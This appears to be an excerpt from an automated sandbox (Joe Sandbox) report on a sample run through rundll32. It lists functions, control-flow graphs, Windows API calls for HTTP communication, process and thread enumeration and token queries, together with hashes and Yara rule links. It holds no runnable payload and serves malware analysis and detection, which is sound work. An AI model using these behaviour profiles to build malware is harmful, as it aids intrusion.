                                                                                                                                                            control_flow_graph 20 1a994297830-1a994297883 21 1a994297885-1a994297888 20->21 22 1a99429788a-1a994297892 InternetOpenW 20->22 21->22 23 1a994297898-1a9942978d7 InternetConnectW 22->23 24 1a994297af9-1a994297afd 22->24 23->24 26 1a9942978dd-1a99429792b HttpOpenRequestW 23->26 25 1a994297aff-1a994297b0c 24->25 27 1a994297b17-1a994297b1a 25->27 28 1a994297b0e-1a994297b11 InternetCloseHandle 25->28 26->25 29 1a994297931-1a99429793b 26->29 30 1a994297b25-1a994297b28 27->30 31 1a994297b1c-1a994297b1d 27->31 28->27 32 1a99429793d-1a994297945 29->32 33 1a994297990-1a9942979ab 29->33 34 1a994297b33-1a994297b3b 30->34 35 1a994297b2a-1a994297b2b 30->35 31->30 32->33 36 1a994297947-1a99429798b call 1a9942c2750 * 2 32->36 33->25 44 1a9942979b1-1a9942979ba 33->44 38 1a994297b41-1a994297b4b 34->38 39 1a994297bd0-1a994297be3 34->39 35->34 36->33 42 1a994297b62-1a994297b73 38->42 43 1a994297b4d-1a994297b54 call 1a9942c1230 38->43 46 1a994297b75-1a994297b78 42->46 47 1a994297b7a-1a994297b8a call 1a99429cb60 42->47 43->42 56 1a994297b56-1a994297b60 call 1a9942bb4e0 43->56 48 1a9942979e6-1a994297a0a 44->48 49 1a9942979bc-1a9942979de call 1a9942c1270 HttpSendRequestA 44->49 46->39 46->47 63 1a994297bba-1a994297bce call 1a9942c1410 47->63 64 1a994297b8c-1a994297bb8 call 1a99429a050 call 1a9942bb4e0 47->64 59 1a994297a0c 48->59 49->25 62 1a9942979e4-1a994297a16 49->62 56->39 59->49 70 1a994297a24-1a994297a3b call 1a9942bb4c0 62->70 71 1a994297a18-1a994297a1f call 1a9942bb4e0 62->71 63->39 63->56 64->39 78 1a994297a3f-1a994297a5b InternetQueryDataAvailable 70->78 71->70 79 1a994297a61-1a994297a69 78->79 80 1a994297ae3-1a994297af7 call 1a9942bb4e0 78->80 79->80 82 1a994297a6b-1a994297a7e 79->82 80->28 82->80 85 1a994297a80-1a994297a86 82->85 85->80 86 1a994297a88-1a994297a96 85->86 87 1a994297a98-1a994297aaa RtlReAllocateHeap 86->87 88 1a994297aac-1a994297aaf call 1a9942bb4c0 86->88 89 1a994297ab4-1a994297ade call 1a9942b44a0 87->89 88->89 89->78
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3737532752-0
                                                                                                                                                            • Opcode ID: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
                                                                                                                                                            • Instruction ID: baa786619e30ceb4f38d11375eab858a4b79c33b7ea3e994db1d117bcf7760be
                                                                                                                                                            • Opcode Fuzzy Hash: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
                                                                                                                                                            • Instruction Fuzzy Hash: 5CB1CF38319A089FEB56EB18D8557ABB7E5FBD9305F04016DA84AC3292DF74D881C783
                                                                                                                                                            Function 000001A9942AF3A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 215threadprocessCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 3779972765-4108050209
                                                                                                                                                            • Opcode ID: 8dc1da9d646cb5a4ca8be2ca344e34fe58ab148069be0f2f5fd075e762ab6ad4
                                                                                                                                                            • Instruction ID: 0d02a002350dd13fef54780dd90c5cf1206e2a09d9ff04872d42a1ce3b7ca269
                                                                                                                                                            • Opcode Fuzzy Hash: 8dc1da9d646cb5a4ca8be2ca344e34fe58ab148069be0f2f5fd075e762ab6ad4
                                                                                                                                                            • Instruction Fuzzy Hash: 5D717D30318B489FE7A5EF28C445BDBB7E1FBCA308F51456DA589C3292DB74A4858B43
                                                                                                                                                            Function 00007DF4BD330000 Relevance: 6.1, APIs: 4, Instructions: 88processCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000003.2308001256.00007DF4BD330000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4BD330000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_3_7df4bd330000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1083639309-0
                                                                                                                                                            • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                            • Instruction ID: cb58618aaf9390a6bdfed6f512e8ebedec54b81d8f1da2aa9007c9898b6022ab
                                                                                                                                                            • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                            • Instruction Fuzzy Hash: A921BC3061494C8FEBA1EF9CC958BEA77F1EB98320F404266D41EDB2A1DE359A448750
                                                                                                                                                            Function 000000018001F820 Relevance: 6.1, APIs: 4, Instructions: 58libraryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 222 18001f820-18001f84c 223 18001f866 222->223 224 18001f84e-18001f854 222->224 226 18001f86b-18001f86d 223->226 224->223 225 18001f856-18001f85b call 18001f790 224->225 230 18001f860-18001f864 225->230 228 18001f881-18001f89e LoadLibraryExW 226->228 229 18001f86f-18001f880 226->229 231 18001f8a9-18001f8b4 228->231 232 18001f8a0-18001f8a7 228->232 230->223 230->226 234 18001f8b6-18001f8bc GetLastError 231->234 235 18001f8be-18001f8cd DeactivateActCtx 231->235 232->231 233 18001f8d7-18001f8e9 232->233 234->235 235->233 236 18001f8cf-18001f8d1 SetLastError 235->236 236->233
                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F889
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F8B6
                                                                                                                                                            • DeactivateActCtx.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F8C5
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,00000001800010A6), ref: 000000018001F8D1
                                                                                                                                                              • Part of subcall function 000000018001F790: OutputDebugStringA.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7AA
                                                                                                                                                              • Part of subcall function 000000018001F790: ActivateActCtx.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7D6
                                                                                                                                                              • Part of subcall function 000000018001F790: GetLastError.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7E0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$ActivateDeactivateDebugLibraryLoadOutputString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 154522064-0
                                                                                                                                                            • Opcode ID: 965344eefb9a915d8432bbca590bac685295136a7b26c93c3187750371bff74b
                                                                                                                                                            • Instruction ID: f34c18d84746ced0a01f47b07f083a590679d846933bb7c3d2bc77e7959d4bfe
                                                                                                                                                            • Opcode Fuzzy Hash: 965344eefb9a915d8432bbca590bac685295136a7b26c93c3187750371bff74b
                                                                                                                                                            • Instruction Fuzzy Hash: 79216631604F9886F7E28B15F48436963E1F78CBE4F598535EA4983B54DF78CA89C700
                                                                                                                                                            Function 000001A99428BE40 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000003.1480402796.000001A994250000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A994250000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_3_1a994250000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                            • Opcode ID: 618b426ce43a0930aa4f239cb6410ad0b0b63f85316a8ca2cad5e1d25ed90040
                                                                                                                                                            • Instruction ID: facdd8d9c430dbe63394a2c7014967a8bffd767daa2f185b5f98a1827da06762
                                                                                                                                                            • Opcode Fuzzy Hash: 618b426ce43a0930aa4f239cb6410ad0b0b63f85316a8ca2cad5e1d25ed90040
                                                                                                                                                            • Instruction Fuzzy Hash: 03B16035218A088FEB54EF1DD885BAEB7E1FB98310F50466DE449C7256DB34E885CB83
                                                                                                                                                            Function 000001A994298ED0 Relevance: 1.9, APIs: 1, Instructions: 410synchronizationCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                            • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                            • Instruction ID: 3c2c4f34c9dabcf35ba3422e57196e3d6404eebcbb208cc92e0c61e00753a356
                                                                                                                                                            • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                            • Instruction Fuzzy Hash: 06E13171508A4D8FE751EF14E895BE6B7F4F7A8340F20067FE84AC2161DB399285CB86
                                                                                                                                                            Function 000001A9942A8C60 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFiber
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3765768292-0
                                                                                                                                                            • Opcode ID: 4766f349428d01386cf4d80b79a1c7ed56ba3d856ad495534efb26931e194ab3
                                                                                                                                                            • Instruction ID: 35cbc3848425fe550c48745777a1676df04e220050093779aebbeda41d5f4650
                                                                                                                                                            • Opcode Fuzzy Hash: 4766f349428d01386cf4d80b79a1c7ed56ba3d856ad495534efb26931e194ab3
                                                                                                                                                            • Instruction Fuzzy Hash: 51510830719D145FEB69AB289C453AA73D5FB99315F60032EEC9BC31E2DA349C4287C2
                                                                                                                                                            Function 000001A9942BB4E0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 419 1a9942bb4e0-1a9942bb4ee 420 1a9942bb523-1a9942bb52f 419->420 421 1a9942bb4f0-1a9942bb505 419->421 421->420 423 1a9942bb507-1a9942bb51d call 1a9942b4ce0 RtlFreeHeap 421->423 423->420
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3894386824.000001A994291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A994291000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_1a994291000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                            • Instruction ID: 66a65c860e00deb534a0a344fcdead8f0f2b8278a4d1ee660d07614f8fdb6bad
                                                                                                                                                            • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                            • Instruction Fuzzy Hash: BDF03034711A088FFB59E7BAACC87B677E2FB9E345F488154A445C6195DB38D841C702
                                                                                                                                                            Function 00000001800EED50 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 426 1800eed50-1800eed5f 427 1800eed6f-1800eed7f 426->427 428 1800eed61-1800eed6d 426->428 430 1800eed96-1800eedae HeapAlloc 427->430 428->427 429 1800eedb2-1800eedbd call 1800dbe9c 428->429 435 1800eedbf-1800eedc4 429->435 431 1800eedb0 430->431 432 1800eed81-1800eed88 call 1800f8138 430->432 431->435 432->429 438 1800eed8a-1800eed94 call 1800ed83c 432->438 438->429 438->430
                                                                                                                                                            APIs
                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00000001800EFD8A,?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EEDA5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                            • Opcode ID: e0a46f7dde9e3ba4f24e4de64af5c5f20b6e50e95c5353bc37afd6febfc4c2c8
                                                                                                                                                            • Instruction ID: cac4e9c05afbe4401a5fb00577771fe5509d6320e3ead36a576abe1af2625a72
                                                                                                                                                            • Opcode Fuzzy Hash: e0a46f7dde9e3ba4f24e4de64af5c5f20b6e50e95c5353bc37afd6febfc4c2c8
                                                                                                                                                            • Instruction Fuzzy Hash: 27F0673530568D81FEEB5B629C403E812906B8EBC0F0CC434690AA63C2EE2CCA8C8320

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 0000000180001510 Relevance: 18.1, APIs: 12, Instructions: 130threadmemoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$CurrentErrorInformationLastOpenProcessThread$AllocateCloseEqualFreeHandleInitialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1828429344-0
                                                                                                                                                            • Opcode ID: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                                            • Instruction ID: 834d127787b2faee8a44574038080d036508957a38a80e6c70e57281afcce267
                                                                                                                                                            • Opcode Fuzzy Hash: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                                            • Instruction Fuzzy Hash: F2518072604A44CAEBA2CF21E8943DE37A4FB4CBC9F049119FA4A43B54DF39C649C710
                                                                                                                                                            Function 00000001800FA160 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                                            • String ID: utf8
                                                                                                                                                            • API String ID: 3069159798-905460609
                                                                                                                                                            • Opcode ID: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                                            • Instruction ID: 411b108c764d4ace3e5c45deb51a3e56b7a9faa629776dbc87eeee4caed17a46
                                                                                                                                                            • Opcode Fuzzy Hash: 87982d937ac6ebdb5a283f5bc56429e212a605fa33fc48f878455754156b73f4
                                                                                                                                                            • Instruction Fuzzy Hash: D591697230878986FBA69B25D4413E923A5F78EBC0F44C129AE48477C6EF79CB59D340
                                                                                                                                                            Function 00000001800FABBC Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2591520935-0
                                                                                                                                                            • Opcode ID: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                                            • Instruction ID: 38b54266c759988556cf6e83805a3aea8ac390e25c82b98d870ebd1b39842dbf
                                                                                                                                                            • Opcode Fuzzy Hash: 1e9adc1dda38233dd7b140b7e964661ef5807d0160702cade7f715b77bf8ccac
                                                                                                                                                            • Instruction Fuzzy Hash: C571ACB2704B588AFB969B60C4547EC33A0BB4EB84F44C429AE0A577C5EF38DA49D350
                                                                                                                                                            Function 00000001800D2C10 Relevance: 9.1, APIs: 6, Instructions: 94libraryloaderCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2238633743-0
                                                                                                                                                            • Opcode ID: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                                            • Instruction ID: 5042ef007f360a4cb06860ac3989e26b2bf5c698eccc4f75d7074bb1ae39fa3f
                                                                                                                                                            • Opcode Fuzzy Hash: afd66515aa9948ed2773430afda3b35ef4169952e25126d91cfabf7fa8ba1592
                                                                                                                                                            • Instruction Fuzzy Hash: 2B411872605B8885EF9B8F22E5543AC67A0B76CFC4F18D121EE4A17B55DF3CCA698310
                                                                                                                                                            Function 00000001800DBA64 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                                            • Instruction ID: 89a1bc4f4d59436b05440924b1a16579084504f17a163dcabdca63123fb111a8
                                                                                                                                                            • Opcode Fuzzy Hash: d660c2806080f6d9061bc518b85ca7ecc7ca63128f146637c6a6910cbddaeea0
                                                                                                                                                            • Instruction Fuzzy Hash: 1E317332214F8486DBA1CF25E8843DE73A4F7887A4F544216EE9D43BA9DF78C649CB10
                                                                                                                                                            Function 00000001800990C0 Relevance: 18.3, APIs: 12, Instructions: 313synchronizationthreadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.3892479582.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.3892428289.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892734581.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892820750.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892851365.000000018014A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892881688.000000018014C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            • Associated: 00000006.00000002.3892966312.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$EnterLeave$CloseCodeConditionDeleteErrorExitHandleLastObjectSingleThreadVariableWaitWake
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1395487824-0
                                                                                                                                                            • Opcode ID: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
                                                                                                                                                            • Instruction ID: e66330fb568cf6e2aa5611fb903b84894a8c80f55f8b343ffe77ccc30def8a2f
                                                                                                                                                            • Opcode Fuzzy Hash: 59bc3c8af923ec3b693e2229fb2451515bb8e98908dc82d78f268815ce38a804
                                                                                                                                                            • Instruction Fuzzy Hash: 62E15A32601B489AEB92CF65E4443DC37B5F348B98F558126EB8D47B95DF38C6A9C340
                                                                                                                                                            Function 000000018009BAC0 Relevance: 18.3, APIs: 12, Instructions: 252COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 0000000180099C70: InitializeCriticalSection.KERNEL32 ref: 0000000180099CAA
